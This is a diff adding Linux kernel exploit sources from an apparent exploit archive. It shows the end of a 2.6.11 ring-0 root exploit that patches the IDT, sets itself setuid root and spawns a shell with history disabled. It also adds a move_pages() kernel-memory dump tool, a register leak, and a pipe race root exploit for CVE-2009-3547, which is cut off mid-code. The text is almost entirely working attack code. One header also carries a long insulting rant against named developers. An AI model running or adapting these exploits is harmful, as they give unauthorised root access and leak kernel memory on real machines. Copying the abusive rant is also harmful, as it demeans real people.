-let's hope this will shut up apm */ -static void -fixint(char *buf) -{ -unsigned *tab = (void *) buf; -int i; - - for (i = 0; i < 256; i++) - tab[i] = 0x0000400; /* 0000:0400h */ - /* iret */ - buf[0x400] =0xcf; -} - -/* establish pte pointing to virtual addr 'addr' */ -static int -map_pte(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 8); - buf[(pagenr) * 1024] = MKPTE(addr); - buf[(pagenr) * 1024+1] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4); -} - -/* make pme user can rw */ -static int -map_pme(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 32); - buf[(pagenr) * 1024] = MKPMD(addr); - buf[(pagenr) * 1024+1] = 0; - buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; - buf[(pagenr) * 1024+3] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4*3); -} - - -static void -error(int d) -{ - printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); - exit(1); -} - - char *bashargv[] = { KRADPS1, NULL }; - char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", - "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", - "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; - -static int -exploit(unsigned kernelbase, int npages) -{ - struct idt *idt; - struct idtr idtr; - - - - signal(SIGSEGV, error); - signal(SIGBUS, error); - - - /* get idt descriptor addr */ - asm ("sidt %0" : "=m" (idtr)); - /* - * if OS in vmware , idtr.base is not right,please fix it - * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table - * c0461000 D idt_table - * //idtr.base = 0xc0461000; - */ - - printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); - - if ( !definePAE ) - { - map_pte(kernelbase, npages, idtr.base - kernelbase); - // idt = pae?(void *)MAP_PAE:(void *)MAP; - idt = (struct idt *)MAP; - }else - { - /* TODO: pse disable case */ - if ( !havepse) - printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); - - map_pme(kernelbase, npages, idtr.base - kernelbase); - idt = (struct idt *) idtr.base; - } - -#if 0 - int * p = (int *) idt; - int i; - for (i=0;i<1024;i++,p++) - printf( "* %p 0x%x\n",p,*p); - fflush(stdout); -#endif - - /** - * cleanup the stuff to prevent others spotting the gate - * - must be done from ring 0 - */ - clear1 = (void *) &idt[0x7f]; - printf("[+] idt[0x7f] addr %p\n",clear1); - - if ( exploitway == 0) - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); - } - else - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - } - - //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - /** - * also can use [2] stub function,but it may cause this message - * - * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 - * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 - * Sep 11 13:11:59 AD4 kernel: [] __might_sleep+0x7d/0x89 - * Sep 11 13:11:59 AD4 kernel: [] sys_capget+0x1d5/0x216 - * Sep 11 13:11:59 AD4 kernel: [] syscall_call+0x7/0xb - * Sep 11 13:11:59 AD4 kernel: [] pipe_writev+0x24/0x320 - * Sep 11 13:11:59 AD4 kernel: [] filp_close+0x59/0x5f - * - */ - - /* call raise_cap or kernel */ - asm ("int $0x7f"); - printf(KRADP "j00 1u(k7 k1d!\n"); - setresuid(0, 0, 0); - setresgid(0, 0, 0); - char cmdbuf[1024]; - snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); - system(cmdbuf); - - execve("/bin/sh", bashargv, bashenvp); - exit(0); -} - - - -static void -usage(char *n) -{ - - printf("\nUsage: %s\n",n); - printf("\t-s forced cpu flag pse \n"); - printf("\t-a define CONFIG_X86_PAE,default none\n"); - printf("\t-e have two kernel code,default 0\n"); - printf("\t-p alloc pages(4k) ,default 1. Increase from 1 to 7\n" - "\t\tThe higher number the more likely it will crash\n"); - printf("\t-t default 0 \n" - "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n"); - printf("\n"); - _exit(1); -} - - -/*read /proc/cpuinfo to set havepse*/ -static void -read_proc(void) -{ - FILE * fp; - char * line = NULL; - size_t len = 0; - ssize_t read; - printf("[+] try open /proc/cpuinfo .."); - fp = fopen("/proc/cpuinfo", "r"); - if (fp == NULL) - { - printf(" failed!!\n"); - return; - } - printf(" ok!!\n"); - - int cpus = 0; - int pse = 0; - while ((read = getline(&line, &len, fp)) != -1) - { - - if (strstr(line,"flags")) - { - if(strstr(line ,"pse ")) - { - pse ++; - } - } - - } - fclose(fp); - - if (line) - free(line); - - if ( pse ) - { - printf("[+] find cpu flag pse in /proc/cpuinfo\n"); - havepse = 1; - } - - return ; - -} - -static void -get_config(int ac, char **av) -{ - - uid = getuid(); - progargv0 = av[0]; - - int r; - - while(ac) { - r = getopt(ac, av, "e:p:t:ash"); - - if(r<0) break; - - switch(r) { - - case 's' : - //pse - havepse = 1; - break; - - case 'a' : - //define CONFIG_X86_PAE - definePAE = 1; - break; - - case 'e' : - exploitway = atoi(optarg); - if(exploitway<0) fatal("bad exploitway value"); - break; - - case 'p' : - npages = atoi(optarg); - break; - case 't' : - thread_size = atoi(optarg); - - break; - - case 'h' : - default: - usage(av[0]); - break; - } - } - - THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192); - - read_proc(); -} - -static void -print_config(unsigned long kernebase) -{ - printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none"); - printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none"); - printf("[+] Exploit Way : %d\n", exploitway); - printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n", - npages,kernebase,kernebase+npages*4 kB); - printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size); - fflush(stdout); -} - - -void prepare(void) -{ - if (geteuid() == 0) - { - setresuid(0, 0, 0); - setresgid(0, 0, 0); - execve("/bin/sh", bashargv, bashenvp); - fatal("[-] Unable to spawn shell"); - } -} - -int -main(int argc, char **argv) -{ - char eater[65536]; - unsigned long kernelbase; - - /* unlink(argv[0]); */ - // sync(); - - printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n" - KRS "Discovered Jan 2005 by sd " KRE "\n" - KRS "Modified 2005/9 by alert7 " KRE "\n"); - - if ( (unsigned long)eater > 0xc0000000) - { - printf("[!Waring!] TODO:use stack > 0xc0000000 \n"); - return 0; - } - - prepare(); - - get_config(argc,argv); - - kernelbase =(unsigned long)eater ; - kernelbase +=0x0fffffff; - kernelbase &=0xf0000000; - - print_config(kernelbase); - - exploit(kernelbase, npages<0?-npages:npages); - - return 0; - -} - -// milw0rm.com [2005-12-30] - - diff --git a/platforms/linux/local/40810.c b/platforms/linux/local/40810.c new file mode 100755 index 000000000..6c479d902 --- /dev/null +++ b/platforms/linux/local/40810.c @@ -0,0 +1,323 @@ +/* sieve (because the Linux kernel leaks like one, get it?) + Bug NOT discovered by Marcus Meissner of SuSE security + This bug was discovered by Ramon de Carvalho Valle in September of 2009 + The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS + for the bug (but had forgotten about it until now) + Ramon's report was sent to Novell's internal bugzilla, upon which + some months later Marcus took credit for discovering someone else's bug + Maybe he thought he could get away with it ;) Almost ;) + + greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle! + + first exploit of 2010, next one will be for a bugclass that has + afaik never been exploited on Linux before + + note that this bug can also cause a DoS like so: + +Unable to handle kernel paging request at ffffffff833c3be8 RIP: + [] new_page_node+0x31/0x48 +PGD 203067 PUD 205063 PMD 0 +Oops: 0000 [1] SMP +Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1 +RIP: 0010:[] [] +new_page_node+0x31/0x48 +RSP: 0018:ffff8100a3c6de50 EFLAGS: 00010246 +RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013 +RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2 +RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c +R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018 +R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28 +FS: 00002b8481125810(0000) GS:ffffffff803c0000(0000) +knlGS:0000000000000000 +CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0 +Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task +ffff81009d8c4080) +Stack: ffffffff800dd008 ffffc20000077000 ffffffff800dc87b +0000000000000000 + 0000000000000000 0000000000000003 ffff810092c23800 0000000000000003 + 00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000 +Call Trace: + [] migrate_pages+0x8d/0x42b + [] new_page_node+0x0/0x48 + [] schedule_on_each_cpu+0xda/0xe8 + [] sys_move_pages+0x339/0x43d + [] tracesys+0xd5/0xe0 + + +Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff +RIP [] new_page_node+0x31/0x48 + RSP +CR2: ffffffff833c3be8 +*/ + +#include +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include "exp_framework.h" + +#undef MPOL_MF_MOVE +#define MPOL_MF_MOVE (1 << 1) + +int max_numnodes; + +unsigned long node_online_map; + +unsigned long node_states; + +unsigned long our_base; +unsigned long totalhigh_pages; + +#undef __NR_move_pages +#ifdef __x86_64__ +#define __NR_move_pages 279 +#else +#define __NR_move_pages 317 +#endif + +/* random notes I took when writing this (all applying to the 64bit case): + +checking in a bitmap based on node_states[2] or node_states[3] +(former if HIGHMEM is not present, latter if it is) + +each node_state is of type nodemask_t, which is is a bitmap of size +MAX_NUMNODES/8 + +RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size + +so the effective base we're working with is either node_states + 16 or +node_states + 24 + +on 2.6.18 it's based off node_online_map + +node_isset does a test_bit based on this base + +so our specfic case does: base[ourval / 8] & (1 << (ourval & 7)) + +all the calculations appear to be signed, so we can both index in the +negative and positive direction, based on ourval + +on 64bit, this gives us a 256MB range above and below our base to grab +memory of +(by passing in a single page and a single node for each bit we want to +leak the value of, we can reconstruct entire bytes) + +we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps, +subtracting their difference, and multiplying by 8 +but we don't need to do this +*/ + +struct exploit_state *exp_state; + +char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak"; + +int get_exploit_state_ptr(struct exploit_state *ptr) +{ + exp_state = ptr; + return 0; +} + +int requires_null_page = 0; + +void addr_to_nodes(unsigned long addr, int *nodes) +{ + int i; + int min = 0x80000000 / 8; + int max = 0x7fffffff / 8; + + if ((addr < (our_base - min)) || + (addr > (our_base + max))) { + fprintf(stdout, "Error: Unable to dump address %p\n", addr); + exit(1); + } + + for (i = 0; i < 8; i++) { + nodes[i] = ((int)(addr - our_base) << 3) | i; + } + + return; +} + +char *buf; +unsigned char get_byte_at_addr(unsigned long addr) +{ + int nodes[8]; + int node; + int status; + int i; + int ret; + unsigned char tmp = 0; + + addr_to_nodes(addr, (int *)&nodes); + for (i = 0; i < 8; i++) { + node = nodes[i]; + ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE); + if (errno == ENOSYS) { + fprintf(stdout, "Error: move_pages is not supported on this kernel.\n"); + exit(1); + } else if (errno != ENODEV) + tmp |= (1 << i); + } + + return tmp; +} + +void menu(void) +{ + fprintf(stdout, "Enter your choice:\n" + " [0] Dump via symbol/address with length\n" + " [1] Dump entire range to file\n" + " [2] Quit\n"); +} + +int trigger(void) +{ + unsigned long addr; + unsigned long addr2; + unsigned char thebyte; + unsigned char choice = 0; + char ibuf[1024]; + char *p; + FILE *f; + + // get lingering \n + getchar(); + while (choice != '2') { + menu(); + fgets((char *)&ibuf, sizeof(ibuf)-1, stdin); + choice = ibuf[0]; + + switch (choice) { + case '0': + fprintf(stdout, "Enter the symbol or address for the base:\n"); + fgets((char *)&ibuf, sizeof(ibuf)-1, stdin); + p = strrchr((char *)&ibuf, '\n'); + if (p) + *p = '\0'; + addr = exp_state->get_kernel_sym(ibuf); + if (addr == 0) { + addr = strtoul(ibuf, NULL, 16); + } + if (addr == 0) { + fprintf(stdout, "Invalid symbol or address.\n"); + break; + } + addr2 = 0; + while (addr2 == 0) { + fprintf(stdout, "Enter the length of bytes to read in hex:\n"); + fscanf(stdin, "%x", &addr2); + // get lingering \n + getchar(); + } + addr2 += addr; + + fprintf(stdout, "Leaked bytes:\n"); + while (addr < addr2) { + thebyte = get_byte_at_addr(addr); + printf("%02x ", thebyte); + addr++; + } + printf("\n"); + break; + case '1': + addr = our_base - 0x10000000; +#ifdef __x86_64__ + /* + our lower bound will cause us to access + bad addresses and cause an oops + */ + if (addr < 0xffffffff80000000) + addr = 0xffffffff80000000; +#else + if (addr < 0x80000000) + addr = 0x80000000; + else if (addr < 0xc0000000) + addr = 0xc0000000; +#endif + addr2 = our_base + 0x10000000; + f = fopen("./kernel.bin", "w"); + if (f == NULL) { + fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n"); + exit(1); + } + + fprintf(stdout, "Dumping to kernel.bin (this will take a while): "); + fflush(stdout); + while (addr < addr2) { + thebyte = get_byte_at_addr(addr); + fputc(thebyte, f); + if (!(addr % (128 * 1024))) { + fprintf(stdout, "."); + fflush(stdout); + } + addr++; + } + fprintf(stdout, "done.\n"); + fclose(f); + break; + case '2': + break; + } + } + + return 0; +} + + +int prepare(unsigned char *ptr) +{ + int node; + int found_gap = 0; + int i; + int ret; + int status; + + totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages"); + node_states = exp_state->get_kernel_sym("node_states"); + node_online_map = exp_state->get_kernel_sym("node_online_map"); + + buf = malloc(4096); + + /* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted + towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table, + which will be set for our single node -- this gives us the size of the bitmap + */ + for (i = 0; i < 512; i++) { + node = i; + ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE); + if (errno == ENOSYS) { + fprintf(stdout, "Error: move_pages is not supported on this kernel.\n"); + exit(1); + } else if (errno == ENODEV) { + found_gap = 1; + } else if (found_gap == 1) { + max_numnodes = i; + fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes); + break; + } + } + + if (node_online_map != 0) + our_base = node_online_map; + /* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size + of each bitmap in the array our base is in the middle of + we've taken account for all this + */ + else if (node_states != 0) + our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8))); + else { + fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n"); + exit(1); + } + + return 0; +} + +int post(void) +{ + return 0; +} \ No newline at end of file diff --git a/platforms/linux/local/40811.c b/platforms/linux/local/40811.c new file mode 100755 index 000000000..527bffd48 --- /dev/null +++ b/platforms/linux/local/40811.c @@ -0,0 +1,132 @@ +/* written by Ingo Molnar -- it's true because this comment says the exploit + was written by him! +*/ + +#include +#include + +unsigned int _r81; +unsigned int _r82; +unsigned int _r91; +unsigned int _r92; +unsigned int _r101; +unsigned int _r102; +unsigned int _r111; +unsigned int _r112; +unsigned int _r121; +unsigned int _r122; +unsigned int _r131; +unsigned int _r132; +unsigned int _r141; +unsigned int _r142; +unsigned int _r151; +unsigned int _r152; + +int leak_it(void) +{ + asm volatile ( + ".intel_syntax noprefix\n" + ".code32\n" + "jmp label1\n" + "farcalllabel1:\n" + ".code64\n" + "mov eax, r8d\n" + "shr r8, 32\n" + "mov ebx, r8d\n" + "mov ecx, r9d\n" + "shr r9, 32\n" + "mov edx, r9d\n" + "mov esi, r10d\n" + "shr r10, 32\n" + "mov edi, r10d\n" + ".att_syntax noprefix\n" + "lret\n" + ".intel_syntax noprefix\n" + "farcalllabel2:\n" + "mov eax, r11d\n" + "shr r11, 32\n" + "mov ebx, r11d\n" + "mov ecx, r12d\n" + "shr r12, 32\n" + "mov edx, r12d\n" + "mov esi, r13d\n" + "shr r13, 32\n" + "mov edi, r13d\n" + ".att_syntax noprefix\n" + "lret\n" + ".intel_syntax noprefix\n" + "farcalllabel3:\n" + "mov eax, r14d\n" + "shr r14, 32\n" + "mov ebx, r14d\n" + "mov ecx, r15d\n" + "shr r15, 32\n" + "mov edx, r15d\n" + ".att_syntax noprefix\n" + "lret\n" + ".intel_syntax noprefix\n" + ".code32\n" + "label1:\n" + ".att_syntax noprefix\n" + "lcall $0x33, $farcalllabel1\n" + ".intel_syntax noprefix\n" + "mov _r81, eax\n" + "mov _r82, ebx\n" + "mov _r91, ecx\n" + "mov _r92, edx\n" + "mov _r101, esi\n" + "mov _r102, edi\n" + ".att_syntax noprefix\n" + "lcall $0x33, $farcalllabel2\n" + ".intel_syntax noprefix\n" + "mov _r111, eax\n" + "mov _r112, ebx\n" + "mov _r121, ecx\n" + "mov _r122, edx\n" + "mov _r131, esi\n" + "mov _r132, edi\n" + ".att_syntax noprefix\n" + "lcall $0x33, $farcalllabel3\n" + ".intel_syntax noprefix\n" + "mov _r141, eax\n" + "mov _r142, ebx\n" + "mov _r151, ecx\n" + "mov _r152, edx\n" + ".att_syntax noprefix\n" + ); + + printf(" R8=%08x%08x\n", _r82, _r81); + printf(" R9=%08x%08x\n", _r92, _r91); + printf("R10=%08x%08x\n", _r102, _r101); + printf("R11=%08x%08x\n", _r112, _r111); + printf("R12=%08x%08x\n", _r122, _r121); + printf("R13=%08x%08x\n", _r132, _r131); + printf("R14=%08x%08x\n", _r142, _r141); + printf("R15=%08x%08x\n", _r152, _r151); + return 0; +} + +/* ripped from jon oberheide */ +const int randcalls[] = { + __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat, + __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl, + __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup, + __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl, + __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday, + __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid, + __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid, + __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority, + __NR_sched_getparam, __NR_sched_get_priority_max +}; + +int main(void) +{ + /* to keep random stack values from being used for pointers in syscalls */ + char buf[64] = {}; + int call; + for (call = 0; call < sizeof(randcalls)/sizeof(randcalls[0]); call++) { + syscall(randcalls[call]); + leak_it(); + } + +} \ No newline at end of file diff --git a/platforms/linux/local/40812.c b/platforms/linux/local/40812.c new file mode 100755 index 000000000..58ebb6a58 --- /dev/null +++ b/platforms/linux/local/40812.c @@ -0,0 +1,468 @@ +/* exp_moosecox.c + Watch a video of the exploit here: + http://www.youtube.com/watch?v=jt81NvaOj5Y + + developed entirely by Ingo Molnar (exploit writer extraordinaire!) , + thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :) + + dedicated to the Red Hat employees who get paid to copy+paste my + twitter and issue security advisories, their sweet + acknowledgement policy, and general classiness + see: https://bugzilla.redhat.com/show_activity.cgi?id=530490 + + "policy" aside, there's a word for what you guys are doing: "plagiarism" + in fact, i tested this one day by posting three links to twitter, + without any discussion on any of them. the same day, those three + (and only those three) links were assigned CVEs, even though two of + them weren't even security bugs (it doesn't pay to copy+paste) + + official Ingo Molnar (that's me) policy for acknowledgement in + exploits requires general douche-ness or plagiarization + official policy further dictates immediate exploit release for + embargoed, patched bug + + I'll be curious to see what the CVE statistics are like for the + kernel this year when they get compiled next year -- I'm predicting + that when someone's watching the sleepy watchers, a more personal + interest is taken in doing the job that you're paid to do correctly. + + -------------------------------------------------------------------- + + Special PS note to Theo (I can do this here because I know he'll + never read it -- the guy is apparently oblivious to the entire world of + security around him -- the same world that invents the protections + years before him that he pats himself on the back for "innovating") + Seriously though, it's incredible to me that an entire team + of developers whose sole purpose is to develop a secure operating + system can be so oblivious to the rest of the world. They haven't + innovated since they replaced exploitable string copies with + exploitable string truncations 6 or so years ago. + + The entire joke of a thread can be read here: + http://www.pubbs.net/openbsd/200911/4582/ + "Our focus therefore is always on finding innovative ideas which make + bugs very hard to exploit succesfully." + "He's too busy watching monkey porn instead of + building researching last-year's security technology that will stop + an exploit technique that has been exploited multiple times." + "it seems that everyone else is slowly coming around to the + same solution." + + So let's talk about this "innovation" of theirs with their + implementation of mmap_min_addr: + + They implemented it in 2008, a year after Linux implemented it, a + year after the public phrack article on the bug class, more than a + year after my mail to dailydave with the first public Linux kernel + exploit for the bug class, and over two years after UDEREF was + implemented in PaX (providing complete protection against the smaller + subset of null ptr dereference bugs and the larger class of invalid + userland access in general). + + OpenBSD had a public null pointer dereference exploit (agp_ioctl()) + published for its OS in January of 2007. It took them over a year + and a half to implement the same feature that was implemented in + Linux a few months after my public exploit in 2007. + + So how can it be that "everyone else is slowly coming around to the + same solution" when "everyone else" came to that solution over a + year before you Theo? In fact, I prediced this exact situation would + happen back in 2007 in my DD post: + http://lists.virus.org/dailydave-0703/msg00011.html + "Expect OpenBSD to independently invent a protection against null ptr + deref bugs sometime in 2009." + + Let's talk about some more "innovation" -- position independent + executables. PaX implemented position independent executables on + Linux back in 2001 (ET_DYN). PIE binary support was added to GNU + binutils in 2003. Those OpenBSD innovators implemented PIE binaries + in 2008, 7 years after PaX. Innovation indeed! + + How about their W^X/ASLR innovation? These plagiarists have the + audacity to announce on their press page: + http://www.openbsd.org/press.html + "Microsoft borrows one of OpenBSD's security features for Vista, + stack/library randomization, under the name Address Space Layout + Randomization (ASLR). "Until now, the feature has been most + prominently used in the OpenBSD Unix variant and the PaX and Exec + Shield security patches for Linux"" + Borrowing one of your features? Where'd this ASLR acronym come from + anyway? Oh that's right, PaX again -- when they published the first + design and implementation of it, and coined the term, in July 2001. + It covered the heap, mmap, and stack areas. + OpenBSD implemented "stack-gap randomization" in 2003. Way to + innovate! + + W^X, which is a horrible name as OpenBSD doesn't even enforce it with + mprotect restrictions like PaX did from the beginning or even SELinux + is doing now (from a 3rd party contribution modeled after PaX): + PaX implemented true per-page non-executable page support, protecting + binary data, the heap, and the stack, back in 2000. + OpenBSD implemented it in 2003, requiring a full userland rebuild. + The innovation is overwhelming! + + They keep coming up with the same exact "innovations" others came up + with years before them. Their official explanation for where they + got the W^X/ASLR ideas was a drunk guy came into their tent at one of + their hack-a-thons and started talking about the idea. They had + never heard of PaX when we asked them in 2003. Which makes the + following involuntarily contributed private ICB logs from Phrack #66 + (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing: + + On some sunny day in July 2002 (t: Theo de Raadt): + why can't you just randomize the base + that's what PaX does + You've not been paying attention to what art's saying, or you don't + understand yet, either case is one of think it through yourself. + whatever + + Only to see poetic justice in August 2003 (ttt: Theo again): + + more exactly, we heard of pax when they started bitching + miod, that was very well spoken. + + That wraps up our OpenBSD history lesson, in case anyone forgot it. + PS -- enjoy that null ptr deref exploit just released for OpenBSD. + + -------------------------------------------------------------------- + + Important final exploit notes: + + don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK, + or DEBUG_SPINLOCK are enabled and modify the structures below + accordingly -- a fancier exploit would do this automatically + + I've broken the 2.4->2.6.10 version of the exploit and would like to see + someone fix it ;) See below for more comments on this. +*/ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "exp_framework.h" + +int pipefd[2]; +struct exploit_state *exp_state; +int is_old_kernel = 0; + +int go_go_speed_racer(void *unused) +{ + int ret; + + while(!exp_state->got_ring0) { + /* bust spinlock */ + *(unsigned int *)NULL = is_old_kernel ? 0 : 1; + ret = pipe(pipefd); + if (!ret) { + close(pipefd[0]); + close(pipefd[1]); + } + } + + return 0; +} + +/* <3 twiz/sgrakkyu */ +int start_thread(int (*f)(void *), void *arg) +{ + char *stack = malloc(0x4000); + int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg); + if (tid < 0) { + printf("can't create thread\n"); + exit(1); + } + sleep(1); + return tid; +} + +char *desc = "MooseCox: Linux <= 2.6.31.5 pipe local root"; +char *cve = "CVE-2009-3547"; + +#define PIPE_BUFFERS 16 + +/* this changes on older kernels, but it doesn't matter to our method */ +struct pipe_buf_operations { + int can_merge; + void *map; + void *unmap; + void *confirm; + void *release; + void *steal; + void *get; +}; + +struct pipe_buffer2620ornewer { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; + unsigned long private; +}; + +struct pipe_buffer2619orolder { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; +}; + +struct pipe_buffer2616orolder { + void *page; + unsigned int offset, len; + void *ops; +}; + +struct pipe_inode_info2620ornewer { + unsigned int spinlock; + /* + // LOCKBREAK + unsigned int break_lock; + // DEBUG_SPINLOCK + unsigned int magic, owner_cpu; + void *owner; + */ + void *next, *prev; + unsigned int nrbufs, curbuf; + void *tmp_page; + unsigned int readers; + unsigned int writers; + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + void *fasync_readers; + void *fasync_writers; + void *inode; + struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS]; +}; + +struct pipe_inode_info2619orolder { + unsigned int spinlock; + /* + // if PREEMPT enabled + unsigned int break_lock; + // DEBUG_SPINLOCK + unsigned int magic, owner_cpu; + void *owner; + */ + void *next, *prev; + unsigned int nrbufs, curbuf; + struct pipe_buffer2619orolder bufs[PIPE_BUFFERS]; + void *tmp_page; + unsigned int start; + unsigned int readers; + unsigned int writers; + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + void *fasync_readers; + void *fasync_writers; + void *inode; +}; + +struct pipe_inode_info2616orolder { + unsigned int spinlock; + /* + // if PREEMPT enabled + unsigned int break_lock; + // DEBUG_SPINLOCK + unsigned int magic, owner_cpu; + */ + void *owner; + void *next, *prev; + unsigned int nrbufs, curbuf; + struct pipe_buffer2616orolder bufs[PIPE_BUFFERS]; + void *tmp_page; + unsigned int start; + unsigned int readers; + unsigned int writers; + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + void *fasync_readers; + void *fasync_writers; +}; + +struct fasync_struct { + int magic; + int fa_fd; + struct fasync_struct *fa_next; + void *file; +}; + +struct pipe_inode_info2610orolder { + /* this includes 2.4 kernels */ + unsigned long lock; // can be rw or spin + void *next, *prev; + char *base; + unsigned int len; + unsigned int start; + unsigned int readers; + unsigned int writers; + /* 2.4 only */ + unsigned int waiting_readers; + + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + /* 2.6 only */ + struct fasync_struct *fasync_readers; + struct fasync_struct *fasync_writers; +}; + +int prepare(unsigned char *buf) +{ + struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf; + struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf; + struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf; + struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf; + struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800; + int i; + int newver; + struct utsname unm; + + i = uname(&unm); + if (i != 0) { + printf("unable to get kernel version\n"); + exit(1); + } + + if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') { + fprintf(stdout, " [+] Using newer pipe_inode_info layout\n"); + newver = 3; + } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') { + fprintf(stdout, " [+] Using older pipe_inode_info layout\n"); + newver = 2; + } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') { + fprintf(stdout, " [+] Using older-er pipe_inode_info layout\n"); + newver = 1; +// } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') { +// is_old_kernel = 1; +// newver = 0; + } else { + fprintf(stdout, " [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\n"); + exit(1); + } + + /* for most of these what will happen is our write will + cause ops->confirm(/pin) to be called, which we've replaced + with own_the_kernel + for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets + called instead (repeatedly) is the release op + */ + if (newver == 3) { + /* uncomment for DEBUG_SPINLOCK */ + //info_new->magic = 0xdead4ead; + /* makes list_head empty for wake_up_common */ + info_new->next = &info_new->next; + info_new->readers = 1; + info_new->writers = 1; + info_new->nrbufs = 1; + info_new->curbuf = 1; + for (i = 0; i < PIPE_BUFFERS; i++) + info_new->bufs[i].ops = (void *)ops; + } else if (newver == 2) { + /* uncomment for DEBUG_SPINLOCK */ + //info_old->magic = 0xdead4ead; + /* makes list_head empty for wake_up_common */ + info_old->next = &info_old->next; + info_old->readers = 1; + info_old->writers = 1; + info_old->nrbufs = 1; + info_old->curbuf = 1; + for (i = 0; i < PIPE_BUFFERS; i++) + info_old->bufs[i].ops = (void *)ops; + } else if (newver == 1) { + /* uncomment for DEBUG_SPINLOCK */ + //info_older->magic = 